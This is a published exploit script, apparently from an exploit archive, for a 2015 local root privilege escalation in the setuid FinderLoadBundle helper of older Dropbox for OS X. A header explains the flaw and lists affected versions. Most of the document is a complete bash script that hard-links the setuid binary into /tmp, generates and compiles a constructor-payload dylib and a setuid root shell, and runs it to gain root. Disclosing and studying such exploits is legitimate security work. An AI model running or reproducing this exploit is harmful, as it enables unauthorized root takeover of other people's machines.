Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit

2015-09-30 13:05:15

#!/bin/bash

# Exploit Title: Dropbox FinderLoadBundle OS X local root exploit
# Google Dork: N/A
# Date: 29/09/15
# Exploit Author: cenobyte
# Vendor Homepage: https://www.dropbox.com
# Software Link: N/A
# Version: Dropbox 1.5.6, 1.6-7.*, 2.1-11.*, 3.0.*, 3.1.*, 3.3.*
# Tested on: OS X Yosemite (10.10.5)
# CVE: N/A

#
# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
# <[email protected]>
#
# - vulnerability description:
# The setuid root FinderLoadBundle that was included in older DropboxHelperTools
# versions for OS X allows loading of dynamically linked shared libraries
# that are residing in the same directory. The directory in which
# FinderLoadBundle is located is owned by root and that prevents placing
# arbitrary files there. But creating a hard link from FinderLoadBundle to
# somewhere in a directory in /tmp circumvents that protection thus making it
# possible to load a shared library containing a payload which creates a root
# shell.
#
# - vulnerable versions: | versions not vulnerable:
# Dropbox 3.3.* for Mac | Dropbox 3.10.* for Mac
# Dropbox 3.1.* for Mac | Dropbox 3.9.* for Mac
# Dropbox 3.0.* for Mac | Dropbox 3.8.* for Mac
# Dropbox 2.11.* for Mac | Dropbox 3.7.* for Mac
# Dropbox 2.10.* for Mac | Dropbox 3.6.* for Mac
# Dropbox 2.9.* for Mac | Dropbox 3.5.* for Mac
# Dropbox 2.8.* for Mac | Dropbox 3.4.* for Mac
# Dropbox 2.7.* for Mac | Dropbox 3.2.* for Mac
# Dropbox 2.6.* for Mac | Dropbox 1.5.1-5 for Mac
# Dropbox 2.5.* for Mac | Dropbox 1.4.* for Mac
# Dropbox 2.4.* for Mac | Dropbox 1.3.* for Mac
# Dropbox 2.3.* for Mac |
# Dropbox 2.2.* for Mac |
# Dropbox 2.1.* for Mac |
# Dropbox 1.7.* for Mac |
# Dropbox 1.6.* for Mac |
# Dropbox 1.5.6 for Mac |
#
# The vulnerability was fixed in newer DropboxHelperTools versions as of 3.4.*.
# However, there is no mention of this issue at the Dropbox release notes:
# https://www.dropbox.com/release_notes
#
# It seems that one of the fixes implemented in FinderLoadBundle is a
# check whether the path of the bundle is a root owned directory making it
# impossible to load arbitrary shared libraries as a non-privileged user.
#
# I am not sure how to find the exact version of the FinderLoadBundle executable
# but the included Info.plist contained the following key:
# <key>CFBundleShortVersionString</key>
# This key is no longer present in the plist file of the latest version. So I
# included a basic vulnerable version checker that checks for the presence of
# this key.
#
# - exploit details:
# I wrote this on OS X Yosemite (10.10.5) but there are no OS specific features
# used. This exploit relies on Xcode for the shared library + root shell to be
# compiled. After successful exploitation a root shell is left in a directory in
# /tmp so make sure you delete it on your own system when you are done testing.
#
# - example:
# $ ./dropboxfinderloadbundle.sh
# Dropbox FinderLoadBundle OS X local root exploit by cenobyte 2015
#
# [-] creating temporary directory: /tmp/c7a15893fc1b28d31071c16c6663cbf3
# [-] linking /Library/DropboxHelperTools/Dropbox_u501/FinderLoadBundle
# [-] constructing bundle
# [-] creating /tmp/c7a15893fc1b28d31071c16c6663cbf3/boomsh.c
# [-] compiling root shell
# [-] executing FinderLoadBundle using root shell payload
# [-] entering root shell
# bash-3.2# id -P
# root:********:0:0::0:0:System Administrator:/var/root:/bin/sh

readonly __progname=$(basename $0)

errx() {
echo "$__progname: $@" >&2
exit 1
}

main() {
local -r tmp=$(head -10 /dev/urandom | md5)
local -r helpertools="/Library/DropboxHelperTools"
local -r bundle="/tmp/$tmp/mach_inject_bundle_stub.bundle/Contents/MacOS"
local -r bundletarget="$bundle/mach_inject_bundle_stub"
local -r bundlesrc="${bundletarget}.c"
local -r sh="/tmp/$tmp/boomsh"
local -r shsrc="${sh}.c"
local -r cfversion="CFBundleShortVersionString"
local -r findbin="FinderLoadBundle"

echo "Dropbox $findbin OS X local root exploit by cenobyte 2015"
echo

uname -v | grep -q ^Darwin || \
errx "this Dropbox exploit only works on OS X"

[ ! -d "$helpertools" ] && \
errx "$helpertools does not exist"

which -s gcc || \
errx "gcc not found"

found=0
for finder in $(ls $helpertools/Dropbox_u*/$findbin); do
stat -s "$finder" | grep -q "st_mode=0104"
if [ $? -eq 0 ]; then
found=1
break
fi
done

[ $found -ne 1 ] && \
errx "couldn't find a setuid root $findbin"

local -r finderdir=$(dirname $finder)
local -r plist="${finderdir}/DropboxBundle.bundle/Contents/Info.plist"

[ -f "$plist" ] || \
errx "FinderLoadBundle not vulnerable (cannot open $plist)"

grep -q "<key>$cfversion</key>" "$plist" || \
errx "FinderLoadBundle not vulnerable (plist missing $cfversion)"

echo "[-] creating temporary directory: /tmp/$tmp"
mkdir /tmp/$tmp || \
errx "couldn't create /tmp/$tmp"

echo "[-] linking $finder"
ln "$finder" "/tmp/$tmp/$findbin" || \
errx "ln $finder /tmp/$tmp/$findbin failed"

echo "[-] constructing bundle"
mkdir -p "$bundle" || \
errx "cannot create $bundle"

echo "#include <sys/stat.h>" > "$bundlesrc"
echo "#include <sys/types.h>" >> "$bundlesrc"
echo "#include <stdlib.h>" >> "$bundlesrc"
echo "#include <unistd.h>" >> "$bundlesrc"
echo "extern void init(void) __attribute__ ((constructor));" >> "$bundlesrc"
echo "void init(void)" >> "$bundlesrc"
echo "{" >> "$bundlesrc"
echo " setuid(0);" >> "$bundlesrc"
echo " setgid(0);" >> "$bundlesrc"
echo " chown(\"$sh\", 0, 0);" >> "$bundlesrc"
echo " chmod(\"$sh\", S_ISUID|S_IRWXU|S_IXGRP|S_IXOTH);" >> "$bundlesrc"
echo "}" >> "$bundlesrc"

echo "[-] creating $shsrc"
echo "#include <unistd.h>" > "$shsrc"
echo "#include <stdio.h>" >> "$shsrc"
echo "#include <stdlib.h>" >> "$shsrc"
echo "int" >> "$shsrc"
echo "main()" >> "$shsrc"
echo "{" >> "$shsrc"
echo " setuid(0);" >> "$shsrc"
echo " setgid(0);" >> "$shsrc"
echo " system(\"/bin/bash\");" >> "$shsrc"
echo " return(0);" >> "$shsrc"
echo "}" >> "$shsrc"

echo "[-] compiling root shell"
gcc "$shsrc" -o "$sh" || \
errx "gcc failed for $shsrc"

gcc -dynamiclib -o "$bundletarget" "$bundlesrc" || \
errx "gcc failed for $bundlesrc"

echo "[-] executing $findbin using root shell payload"
cd "/tmp/$tmp"
./$findbin mach_inject_bundle_stub.bundle 2>/dev/null 1>/dev/null
[ $? -ne 4 ] && \
errx "exploit failed, $findbin seems not vulnerable"

[ ! -f "$sh" ] && \
errx "$sh was not created, exploit failed"

stat -s "$sh" | grep -q "st_mode=0104" || \
errx "$sh was not set to setuid root, exploit failed"
echo "[-] entering root shell"

"$sh"
}

main "$@"

exit 0

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